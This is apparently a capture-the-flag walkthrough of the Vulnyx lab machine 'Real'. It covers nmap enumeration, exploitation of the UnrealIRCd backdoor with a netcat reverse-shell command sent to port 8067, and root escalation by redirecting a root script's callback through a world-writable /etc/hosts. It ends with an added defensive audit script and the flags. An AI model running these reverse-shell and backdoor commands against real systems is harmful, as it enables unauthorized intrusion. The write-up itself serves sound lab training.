Real

Target description

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:13 CST
Nmap scan report for 192.168.2.1
Host is up (0.00034s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00085s latency).
MAC Address: 08:00:27:48:64:28 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.37
Host is up (0.00078s latency).
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds

Target IP: 192.168.2.37

2. Port scanning

(1) Full TCP port scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:13 CST
Nmap scan report for 192.168.2.37
Host is up (0.0017s latency).
Not shown: 65530 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
6667/tcp open  irc
6697/tcp open  ircs-u
8067/tcp open  infi-async
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 36.26 seconds

Open ports: 22, 80, 6667, 6697, 8067

(2) Service and version scan

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,6667,6697,8067 192.168.2.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:14 CST
Nmap scan report for 192.168.2.37
Host is up (0.00094s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 db:28:2b:ab:63:2a:0e:d5:ea:18:8d:2f:6d:8c:45:2d (RSA)
|   256 cd:a1:c3:2e:20:f0:f3:f6:d3:9b:27:8e:9a:2d:26:11 (ECDSA)
|_  256 db:98:69:a5:8b:bd:05:86:16:3d:9c:8b:30:7b:a3:6c (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
6667/tcp open  irc     UnrealIRCd (Admin email example@example.com)
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds

(3) UDP scan

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:15 CST
Nmap scan report for 192.168.2.37
Host is up (0.00071s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 102.93 seconds

II. Web Penetration

1. Port 80

Only the Apache default page is served.

2. IRC protocol

IRC was originally a plain-text protocol. IANA assigned it 194/TCP, but it usually runs on 6667/TCP and nearby ports so that the daemon does not need root privileges.
Connecting to a server requires only a nickname. Once connected, the server performs a reverse DNS lookup on the user's IP address.
Users are divided into operators and ordinary users; operators must supply a username and password to obtain additional access. Operator privilege levels vary, with administrators at the top.

💡Tip

https://book.hacktricks.wiki/zh/network-services-pentesting/pentesting-irc.html

The initial scan found UnrealIRCd running on several ports (6667/tcp, 6697/tcp, 8067/tcp). UnrealIRCd has a well-known backdoor vulnerability, so the next step is to confirm whether the version on the target is affected.

Probe the IRC service for the vulnerability with Nmap:

┌──(root㉿kali)-[/miaosec]
└─# nmap -p 6667,6697,8067 --script irc-unrealircd-backdoor 192.168.2.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-08 09:59 CST
Nmap scan report for 192.168.2.37
Host is up (0.0010s latency).

PORT     STATE SERVICE
6667/tcp open  irc
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
6697/tcp open  ircs-u
8067/tcp open  infi-async
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
MAC Address: 08:00:27:2C:CF:5E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 46.48 seconds

The scan confirms that the UnrealIRCd instance on port 8067 carries the backdoor. This is a critical remote command execution vulnerability (CVE-2010-2075) that lets an attacker run arbitrary commands on the server.

III. Getting a Shell as server

Having confirmed that the target has the UnrealIRCd backdoor, the next step is to use it to execute a command.

  1. Send a reverse shell command

    ┌──(root㉿kali)-[/miaosec]
    └─# echo -e "AB; nc -e /bin/bash 192.168.2.4 4444" | nc 192.168.2.37 8067
    :irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
    :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
    :irc.foonet.com NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead

  2. Receive the shell

    ┌──(root㉿kali)-[~]
    └─# nc -lvnp 4444
    listening on [any] 4444 ...
    connect to [192.168.2.4] from (UNKNOWN) [192.168.2.37] 41932
    id
    uid=1000(server) gid=1000(server) groups=1000(server)

IV. Privilege Escalation

Looking in /opt, there is a file named task that is owned by root:

server@real:/opt$ ls -la
-rwx---r-- 1 root root 277 May 3 2023 task

Script analysis:
The script pings a hard-coded domain name. If the ping succeeds, it connects back to that domain on port 65000 and hands over a root shell (by executing /bin/sh); otherwise it exits.

server@real:/opt$ cat task
#!/bin/bash

domain='shelly.real.nyx'

function check(){

    timeout 1 bash -c "/usr/bin/ping -c 1 $domain" > /dev/null 2>&1
    if [ "$(echo $?)" == "0" ]; then
        /usr/bin/nohup nc -e /usr/bin/sh $domain 65000
        exit 0
    else
        exit 1
    fi
}

check

Search for world-writable files:

server@real:/opt$ find / \( -path /proc -o -path /sys \) -prune -o -perm -o=w -type f -print 2>/dev/null
/home/server/irc/Unreal3.2/tmp/103B282.commands.so
/home/server/irc/Unreal3.2/tmp/23FC6410.cloak.so
/home/server/irc/Unreal3.2/ircd.log
/home/server/irc/Unreal3.2/unreal
/home/server/irc/Unreal3.2/src/modules/cloak.so
/home/server/irc/Unreal3.2/src/modules/commands.so
/etc/hosts

/etc/hosts turns out to be writable. Combined with what the task script does, we try adding a hosts entry
that resolves the domain shelly.real.nyx to the attack machine, 192.168.2.4:

server@real:/opt$ echo "192.168.2.4 shelly.real.nyx" >> /etc/hosts

Start a listener on port 65000 on the attack machine. After a short wait, a root shell connects back:

┌──(root㉿kali)-[~]
└─# nc -lvnp 65000
listening on [any] 65000 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.37] 50170
id
uid=0(root) gid=0(root) groups=0(root)
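
The escalation above rests on two conditions that a defender can check for directly: /etc/hosts is writable by every local user, and a script that runs as root resolves a host name and trusts whatever address comes back. The shell script below is an added example for this writeup, not code from the box or from the original post. It audits a hosts file for the others-write bit, reusing the same `find -perm -o=w` test the enumeration step above relied on, and lists any non-loopback addresses the file maps a given name to. The function names, the sample hosts content and the use of a temporary file are constructed for the demonstration; the host name shelly.real.nyx is the one hard-coded in the task script. On a live system the call would be `audit_hosts_file /etc/hosts shelly.real.nyx`.

```shell
#!/bin/sh
# Added example for this writeup (not code from the box or the original post).
# Audits the two preconditions the /opt/task escalation relied on:
#   1. the hosts file is writable by "others" (world-writable), and
#   2. the hosts file maps a name a root-run script trusts to a non-loopback address.
# Hypothetical live usage:  audit_hosts_file /etc/hosts shelly.real.nyx

# Return 0 if FILE has the others-write bit set. Uses the same
# `find -perm -o=w` test as the enumeration step in the writeup.
is_world_writable() {
    [ -n "$(find "$1" -prune -perm -o=w -print 2>/dev/null)" ]
}

# Print every non-loopback address that FILE maps NAME to, one per line.
# Comments are stripped first; NAME must match a whole hostname token.
hosts_entries_for() {
    name=$1
    file=$2
    sed 's/#.*//' "$file" | awk -v n="$name" '
        NF >= 2 && $1 !~ /^127\./ && $1 != "::1" {
            for (i = 2; i <= NF; i++) if ($i == n) print $1
        }'
}

# Report both conditions for FILE and NAME; return 1 if either is present.
audit_hosts_file() {
    file=$1
    name=$2
    rc=0
    if is_world_writable "$file"; then
        echo "FINDING: $file is writable by everyone ($(ls -l "$file" | cut -d' ' -f1))"
        rc=1
    fi
    addrs=$(hosts_entries_for "$name" "$file")
    if [ -n "$addrs" ]; then
        echo "FINDING: $name is pinned in $file to: $(echo "$addrs" | tr '\n' ' ')"
        rc=1
    fi
    [ "$rc" -eq 0 ] && echo "OK: $file is not world-writable and has no entry for $name"
    return "$rc"
}

# Constructed sample: a hosts file as it looked on the box after the
# low-privileged user appended the attacker's address, with mode 646.
SAMPLE=$(mktemp)
trap 'rm -f "$SAMPLE"' EXIT
cat > "$SAMPLE" <<'EOF'
127.0.0.1   localhost
127.0.1.1   real
::1         localhost ip6-localhost
192.168.2.4 shelly.real.nyx   # appended by the server user
EOF
chmod 646 "$SAMPLE"

audit_hosts_file "$SAMPLE" shelly.real.nyx || echo "audit failed: see findings above"
```

The expected healthy state is mode 644 on /etc/hosts and no entry for the name the root script resolves; either finding is exactly the precondition this box was built around. Because the task script will connect out to whatever the name resolves to, the longer-term control is to baseline /etc/hosts with a file-integrity monitor and to treat any root-run job that performs network callbacks based on mutable name resolution as a design flaw rather than a permissions slip.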

V. Read the Flags

cat /root/root.txt /home/server/user.txt
593ba7e2d1e66b12e1488d6ea30c8787
3b7fb7c1c8737a5c67dc513657e3efb3

Real
http://miao-sec.github.io/Vulnyx/Real/
Author: Miao
Published: January 9, 2026
License: BY-MIAO